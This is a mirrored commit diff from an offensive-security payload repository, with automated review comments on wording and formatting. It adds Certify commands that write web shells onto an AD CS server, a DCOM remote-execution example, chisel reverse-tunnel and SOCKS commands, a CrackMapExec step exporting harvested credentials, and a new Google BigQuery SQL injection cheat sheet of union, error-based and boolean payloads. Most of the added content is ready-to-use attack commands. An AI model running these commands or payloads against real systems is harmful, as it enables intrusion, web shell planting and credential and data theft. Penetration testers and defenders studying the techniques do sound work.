mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-14 00:47:20 +00:00
ADCS ESC7 Shell + Big Query SQL
parent
4357f1e48f
commit
71dcfd5ca7
4 changed files with 114 additions and 5 deletions
|
@ -260,7 +260,12 @@ root@payload$ ./bloodhound --no-sandbox
|
||||||
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
|
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
|
||||||
```
|
```
|
||||||
|
|
||||||
You can add some custom queries like [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) and [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json). Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`.
|
You can add some custom queries like :
|
||||||
|
* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json)
|
||||||
|
* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json)
|
||||||
|
* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json)
|
||||||
|
|
||||||
|
Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`.
|
||||||
|
|
||||||
|
|
||||||
### Using PowerView
|
### Using PowerView
|
||||||
|
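Review bot: The closing instruction "Replace the customqueries.json file located at ..." no longer fits a list of three alternative sources, because replacing the file keeps only one of them. Suggest stating that the reader picks one list or merges the entries of several into a single `customqueries.json`. Two style points in the same lines: "like :" has a stray space before the colon, and the Exegol entry links to `raw.githubusercontent.com` while the other two use `github.com/.../blob/...` links.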
@ -2302,6 +2307,22 @@ Exploitation:
|
||||||
Certify.exe setconfig /removeapproval /restart
|
Certify.exe setconfig /removeapproval /restart
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Alternative exploitation from **ManageCA** to **RCE** on ADCS server:
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
# Get the current CDP list. Useful to find remote writable shares:
|
||||||
|
Certify.exe writefile /ca:SERVER\ca-name /readonly
|
||||||
|
|
||||||
|
# Write an aspx shell to a local web directory:
|
||||||
|
Certify.exe writefile /ca:SERVER\ca-name /path:C:\Windows\SystemData\CES\CA-Name\shell.aspx /input:C:\Local\Path\shell.aspx
|
||||||
|
|
||||||
|
# Write the default asp shell to a local web directory:
|
||||||
|
Certify.exe writefile /ca:SERVER\ca-name /path:c:\inetpub\wwwroot\shell.asp
|
||||||
|
|
||||||
|
# Write a php shell to a remote web directory:
|
||||||
|
Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
#### ESC8 - AD CS Relay Attack
|
#### ESC8 - AD CS Relay Attack
|
||||||
|
|
||||||
|
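Review bot: The added block under "Alternative exploitation from **ManageCA** to **RCE** on ADCS server:" does not say which Certify build provides `writefile`, so a reader cannot tell where the command comes from. Suggest linking the "AD CS: from ManageCA to RCE" reference that this commit adds at the end of the file directly under that sentence. The placeholders are also inconsistent: `/ca:SERVER\ca-name` versus `CES\CA-Name` in the path, and `C:\Local\Path` versus `C:\Local\path`; use one spelling for each. The hunk ends with two consecutive blank lines before `#### ESC8 - AD CS Relay Attack`; one is enough.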
@ -2599,11 +2620,15 @@ bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F38
|
||||||
> DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer.
|
> DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer.
|
||||||
|
|
||||||
|
|
||||||
* Impacket DcomExec.py
|
* Impacket DCOMExec.py
|
||||||
```ps1
|
```ps1
|
||||||
dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] target [command ...]
|
dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] target [command ...]
|
||||||
dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>'
|
dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>'
|
||||||
dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>' 'ipconfig'
|
dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>' 'ipconfig'
|
||||||
|
|
||||||
|
python3 dcomexec.py -object MMC20 -silentcommand -debug $DOMAIN/$USER:$PASSWORD\$@$HOST 'notepad.exe'
|
||||||
|
# -object MMC20 specifies that we wish to instantiate the MMC20.Application object.
|
||||||
|
# -silentcommand executes the command without attempting to retrieve the output.
|
||||||
```
|
```
|
||||||
* CheeseTools - https://github.com/klezVirus/CheeseTools
|
* CheeseTools - https://github.com/klezVirus/CheeseTools
|
||||||
```powershell
|
```powershell
|
||||||
|
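Review bot: In the added line `python3 dcomexec.py -object MMC20 -silentcommand -debug $DOMAIN/$USER:$PASSWORD\$@$HOST 'notepad.exe'`, the `\$` between `$PASSWORD` and `@` appends a literal `$` to the password with no explanation, which looks like a typo. The line also switches to shell variables while the existing examples in the same block use `<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>`, and `$USER` is normally already set by the shell to the local login name. Suggest reusing the angle-bracket placeholders and moving the two `#` comment lines above the command they describe. The heading fix from `DcomExec.py` to `DCOMExec.py` still differs from the lowercase `dcomexec.py` used in the commands.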
@ -3494,3 +3519,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||||
* [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4)
|
* [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4)
|
||||||
* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/)
|
* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/)
|
||||||
* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/)
|
* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/)
|
||||||
|
* [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/)
|
||||||
|
|
|
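Review bot: The added reference "AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh" puts the date before the authors, while the entry directly above it ("AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022") uses title, author, date. Suggest reordering the new entry to match.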
@ -15,3 +15,13 @@ $ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only
|
||||||
$ who
|
$ who
|
||||||
$ write root pts/2 # press Ctrl+D after typing the message.
|
$ write root pts/2 # press Ctrl+D after typing the message.
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## CrackMapExec Credential Database
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
cmedb (default) > workspace create test
|
||||||
|
cmedb (test) > workspace default
|
||||||
|
cmedb (test) > proto smb
|
||||||
|
cmedb (test)(smb) > creds
|
||||||
|
cmedb (test)(smb) > export creds csv /tmp/creds
|
||||||
|
```
|
|
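Review bot: The new `## CrackMapExec Credential Database` section has no introductory sentence, and it is appended after context lines about `who` and `write`, so it is unclear that this file is the right home for it. Suggest one line saying what `cmedb` is and what the session does. The fence is tagged `ps1` although the content is an interactive `cmedb` prompt, and `export creds csv /tmp/creds` writes the credential export into a shared directory; a note to export into a directory only the operator can read, and to delete the file afterwards, would help.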
@ -8,7 +8,7 @@
|
||||||
* [Local Port Forwarding](#local-port-forwarding)
|
* [Local Port Forwarding](#local-port-forwarding)
|
||||||
* [Remote Port Forwarding](#remote-port-forwarding)
|
* [Remote Port Forwarding](#remote-port-forwarding)
|
||||||
* [Proxychains](#proxychains)
|
* [Proxychains](#proxychains)
|
||||||
* [Graphtcp](#graphtcp)
|
* [Graftcp](#graftcp)
|
||||||
* [Web SOCKS - reGeorg](#web-socks---regeorg)
|
* [Web SOCKS - reGeorg](#web-socks---regeorg)
|
||||||
* [Web SOCKS - pivotnacci](#web-socks---pivotnacci)
|
* [Web SOCKS - pivotnacci](#web-socks---pivotnacci)
|
||||||
* [Metasploit](#metasploit)
|
* [Metasploit](#metasploit)
|
||||||
|
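Review bot: The table-of-contents entry changes from `[Graphtcp](#graphtcp)` to `[Graftcp](#graftcp)`, but no hunk shown for this file renames the section heading the anchor points to. Please confirm the heading already reads `Graftcp`, otherwise the corrected link will not resolve.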
@ -232,8 +232,11 @@ $ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa"
|
||||||
go get -v github.com/jpillora/chisel
|
go get -v github.com/jpillora/chisel
|
||||||
|
|
||||||
# forward port 389 and 88 to hacker computer
|
# forward port 389 and 88 to hacker computer
|
||||||
user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389
|
|
||||||
user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
|
user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
|
||||||
|
user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389
|
||||||
|
|
||||||
|
# SOCKS
|
||||||
|
user@victim$ .\chisel.exe client YOUR_IP:8008 R:socks
|
||||||
```
|
```
|
||||||
|
|
||||||
### SharpChisel
|
### SharpChisel
|
||||||
|
|
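Review bot: The added `# SOCKS` example shows only the client line `.\chisel.exe client YOUR_IP:8008 R:socks` and does not say that it depends on the same `chisel server -p 8008 --reverse` listener shown above, or where the resulting proxy is exposed. Suggest a one-line comment covering both. After the reorder, the comment `# forward port 389 and 88 to hacker computer` sits above the server command rather than the client command that carries the `R:88` and `R:389` forwards; moving it down one line would keep it next to what it describes.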
70
SQL Injection/BigQuery Injection.md
Normal file
|
@ -0,0 +1,70 @@
|
||||||
|
# Google BigQuery SQL Injection
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Detection](#detection)
|
||||||
|
* [BigQuery Comment](#bigquery-comment)
|
||||||
|
* [BigQuery Union Based](#bigquery-union-based)
|
||||||
|
* [BigQuery Error Based](#bigquery-error-based)
|
||||||
|
* [BigQuery Boolean Based](#bigquery-boolean-based)
|
||||||
|
* [BigQuery Time Based](#bigquery-time-based)
|
||||||
|
* [References](#references)
|
||||||
|
|
||||||
|
## Detection
|
||||||
|
|
||||||
|
* Use a classic single quote to trigger an error: `'`
|
||||||
|
* Identify BigQuery using backtick notation: ```SELECT .... FROM `` AS ...```
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
# Gathering project id
|
||||||
|
select @@project_id
|
||||||
|
|
||||||
|
# Gathering all dataset names
|
||||||
|
select schema_name from INFORMATION_SCHEMA.SCHEMATA
|
||||||
|
|
||||||
|
# Gathering data from specific project id & dataset
|
||||||
|
select * from `project_id.dataset_name.table_name`
|
||||||
|
```
|
||||||
|
|
||||||
|
## BigQuery Comment
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
select 1#from here it is not working
|
||||||
|
select 1/*between those it is not working*/
|
||||||
|
```
|
||||||
|
|
||||||
|
## BigQuery Union Based
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
|
||||||
|
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
|
||||||
|
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
|
||||||
|
' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name#
|
||||||
|
```
|
||||||
|
|
||||||
|
## BigQuery Error Based
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
# Error based - division by zero
|
||||||
|
' OR if(1/(length((select('a')))-1)=1,true,false) OR '
|
||||||
|
|
||||||
|
# Error based - casting: select CAST(@@project_id AS INT64)
|
||||||
|
dataset_name.column_name` union all select CAST(@@project_id AS INT64) ORDER BY 1 DESC#
|
||||||
|
```
|
||||||
|
|
||||||
|
## BigQuery Boolean Based
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#
|
||||||
|
```
|
||||||
|
|
||||||
|
## BigQuery Time Based
|
||||||
|
|
||||||
|
* Time based functions does not exist in the BigQuery syntax.
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [BigQuery SQL Injection Cheat Sheet - Ozgur Alp - Feb 14](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac)
|
||||||
|
* [BigQuery Documentation - Query Syntax](https://cloud.google.com/bigquery/docs/reference/standard-sql/query-syntax)
|
||||||
|
* [BigQuery Documentation - Functions and Operators](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators)
|
||||||
|
* [Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability - By Duc Nguyen The, March 31, 2020](https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/)
|
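Review bot: Every code fence in the new file is tagged `ps1` although the content is BigQuery SQL, so the blocks will be highlighted as PowerShell; suggest `sql`. In the Detection list, the inline example is wrapped in triple backticks inside a bullet, which is fragile in Markdown renderers, and the `## Detection` block mixes detection with enumeration queries that would read better under their own heading. "Time based functions does not exist" should read "do not exist", and the first reference gives "Feb 14" without a year. The union-based payloads close parentheses that are opened in a query the page never shows, so a sentence describing the assumed original query would make them understandable. The page would also benefit from a short closing note that parameterized queries are the fix.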